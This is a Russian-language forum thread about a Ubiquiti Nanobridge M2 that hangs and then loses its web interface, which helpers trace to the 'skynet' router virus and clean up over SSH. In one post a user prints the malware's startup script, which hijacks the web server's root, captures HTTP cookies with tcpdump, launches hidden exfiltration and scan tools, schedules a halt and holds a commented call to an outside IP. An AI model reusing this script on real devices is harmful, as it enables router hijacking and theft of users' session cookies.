Jump to content
Калькуляторы

Nanobridge M2 - ограниченный uptime

Уважаемые форумчане, где собака порылась?

У моего Nanobridge M2 аптаймы по 27 часов 54 минуты. После этого на него нельзя зайти ни извне ни изнутри. Помогает ресет передергиванием питания.

 

Посоветовали обновить прошивку.

Скачал прошивку. Черех вэб интерфейс начал обновлять.

Индикатор медленно дополз до середины, а потом быстро добежал до конца.

Бридж перегрузился, захожу на него снова - прошивка старая.

Запусил еще раз обновление - теперь индикатор медленно и уверенно дошел до конца

Но теперь не могу зайти на вэб интрефейс и соответственно ни к каким настройкам доступа нет.

IP адрес остался тем же, инет есть.

Что делать??? Прошу помощи!

Спасибо.

Share this post


Link to post
Share on other sites
У моего Nanobridge M2 аптаймы по 27 часов 54 минуты. После этого на него нельзя зайти ни извне ни изнутри. Помогает ресет передергиванием питания.

Достаточно было вочдог настроить...

У Вас случайно логирование не было включено?

 

Какая прошивка стояла?

 

Попробуйте через ssh подклюится, если полуится -- зайдите в /etc/persistent/

если там есть файлы вида rc.* то их надо удалить, после чего вести команду

cfgmtd -p /etc -w

и перегрузить

Share this post


Link to post
Share on other sites

Достаточно было вочдог настроить...

У Вас случайно логирование не было включено?

 

Перед прошивкой сделал скриншоты всех вкладок.

На вкладке Sestemlog - Enable Ping WatchDog и Enable System Log флажки сняты.

 

Какая прошивка стояла?

 

Стояла 5.3.3

Хотел поставить 5.5.3

 

Попробуйте через ssh подклюится, если полуится -- зайдите в /etc/persistent/

если там есть файлы вида rc.* то их надо удалить, после чего вести команду

cfgmtd -p /etc -w

и перегрузить

 

Это попробую, но пока не знаю как - никогда не делал и не знаю как это делается ((

 

По https не пробовали войти ?

Попробовал - то же самое

Share this post


Link to post
Share on other sites
У моего Nanobridge M2 аптаймы по 27 часов 54 минуты. После этого на него нельзя зайти ни извне ни изнутри. Помогает ресет передергиванием питания.

Достаточно было вочдог настроить...

У Вас случайно логирование не было включено?

 

Какая прошивка стояла?

 

Попробуйте через ssh подклюится, если полуится -- зайдите в /etc/persistent/

если там есть файлы вида rc.* то их надо удалить, после чего вести команду

cfgmtd -p /etc -w

и перегрузить

 

Все проделал - интерфейс запустился))

Только тот файл не стал удалять, переименовал.

Понаблюдаю теперь какой будет аптайм, может попустило.

Спасибо!

Share this post


Link to post
Share on other sites

У Вас вирус.

Этого файла быть не должно.

Вирус мог попасть из-за старой весии прошивки, в которой была известная дыра в безопасности.

 

Чтоб такого не повторялось следует использовать спец. vlan для управления точками.

 

Сделайте

 

cat rc.остаток_имени_файла

Интересно посмотреть на код вируса.

Share this post


Link to post
Share on other sites

Не знаю как сам текст скопировать ((

Пробовал выделять мышкой, а он потом как-то дублировался в окне, он хоть не выполнился?

XM.v5.5.3# ls
cardlist.txt           dropbear_rsa_host_key
dropbear_dss_host_key  rcpoststartold
XM.v5.5.3# cat rcpoststartold
#!/bin/sh
sed -i 's/\/usr\/www/\/etc\/persistent\/.skynet/g' /etc/lighttpd.conf
kill -9 `ps | grep "lighttpd -D" | cut -d" " -f 3`
ip=`ifconfig ath0 | grep inet | sed "s/.*inet addr:\([^ ]*\).*/\1/g"`

#sleep 60 && trigger_url http://178.216.144.75/probe.cgi/.gif?ip=$ip &

if [ -e /bin/tcpdump ]; then
tcpdump -A -s 0 -w - -l "tcp dst port 80" | grep "^Cookie: " | grep "xs=" >/etc/persistent/.skynet/tt &
/etc/persistent/.skynet/sendcook &
fi
(sleep 20 ; /etc/persistent/.skynet/scan) &
(sleep 100400 ; sleep 42 ; halt) &
XM.v5.5.3#

Edited by lvv

Share this post


Link to post
Share on other sites

Как только Вы выделили мышью -- он скопировался (и можно уже вставлять), а если нажали правой кнопкой -- вставился, ну и что-то выполнилось,но не очень страшно.

Да, это вирус skynet, правда, одной из первых версий, так что ничего особо страшного...

интересно, что за:

cardlist.txt

Его там тоже не должно быть.

 

И судя по коду там должна быть скрытая папка:

ls -a

./skynet её можно тоже удалить

Share this post


Link to post
Share on other sites
XM.v5.5.3# ls -a
.                      cardlist.txt           dropbear_rsa_host_key
..                     dropbear_dss_host_key  rcpoststartold
XM.v5.5.3# cat cardlist.txt
#Format:
#Vendor:Product:cdma/gsm:PPP dev handle:backend dev handle:AT+CSQ:pic file name:notes:backendmode
1199:6880:gsm:/dev/ttyUSB4:/dev/ttyUSB3:AT+CSQ:3g_sierra_mercury_connect.gif:Sierra Wireless USB Connect Mercury:2
1199:6890:gsm:/dev/ttyUSB4:/dev/ttyUSB3:AT+CSQ:3g_sierra_usb888.gif:Sierra Wireless USB 888:3
1199:0025:cdma:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_598U.gif:Sierra Wireless 598U:1
1199:68a3:gsm:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_lightning_usb305.gif:Sierra Wireless Lightning USB 305:3
1199:683c:gsm:/dev/ttyUSB4:/dev/ttyUSB3:AT+CSQ:3g_sierra_mc8790.gif:Sierra MC8790 HSPA Module:3
1410:6000:cdma:/dev/ttyUSB0::AT+CSQ:3g_novatel_usb760.png:Novatel U760:0
1004:6141:gsm:/dev/ttyACM0:/dev/ttyACM1:AT+CSQ:3g_lg_usbconnect_turbo.gif:LGE USB Connect Turbo:3
1199:0024:cdma:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_mc5727.gif:Sierra MC5727:1
1199:0224:cdma:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_mc5727.gif:Sierra MC5727:1
1199:0028:cdma:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_mc5728.gif:Sierra MC5728:1

#unverified that anything is on ttyUSB1
0af0:7a05:gsm:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_option_usbconnect_velocity.gif:Option USB Connect Velocity:0
12d1:1464:gsm:/dev/ttyUSB0:/dev/ttyUSB3:AT+CSQ:3g_vodafone_huawei.gif:Vodafone Mobile Broadband (Huawei):3
19d2:0015:gsm:/dev/ttyUSB0:/dev/ttyUSB2:AT+CSQ:3g_zte_mf628.gif:ZTE MF628:3
19d2:0016:gsm:/dev/ttyUSB0:/dev/ttyUSB3:AT+CSQ:3g_zte_k3565_z.gif:Vodafone ZTE K3565-Z:3
19d2:0063:gsm:/dev/ttyUSB3:/dev/ttyUSB1:AT+CSQ:3g_zte_k3565_z.gif:Vodafone ZTE K3565-Z:3
19d2:0104:gsm:/dev/ttyUSB0:/dev/ttyUSB3:AT+CSQ:3g_zte_k4505_z.gif:Vodafone ZTE K4505-Z:3
12d1:140c:gsm:/dev/ttyUSB0:/dev/ttyUSB3:AT+CSQ:3g_huawei_E173.gif:Huawei E173:3
XM.v5.5.3#

Share this post


Link to post
Share on other sites

Фигя какая-то, ну и фиг с ней, рекомендую, кста, перегрузить ещё раз, сменить пароль(т.к. вирус мог его стырить) и перегрузить повторно.

Share this post


Link to post
Share on other sites

NewUse

Ура - все заработало как надо! Проблема решена (удалил лишние файлы)!!!

Спасибо большое!!!

Edited by lvv

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this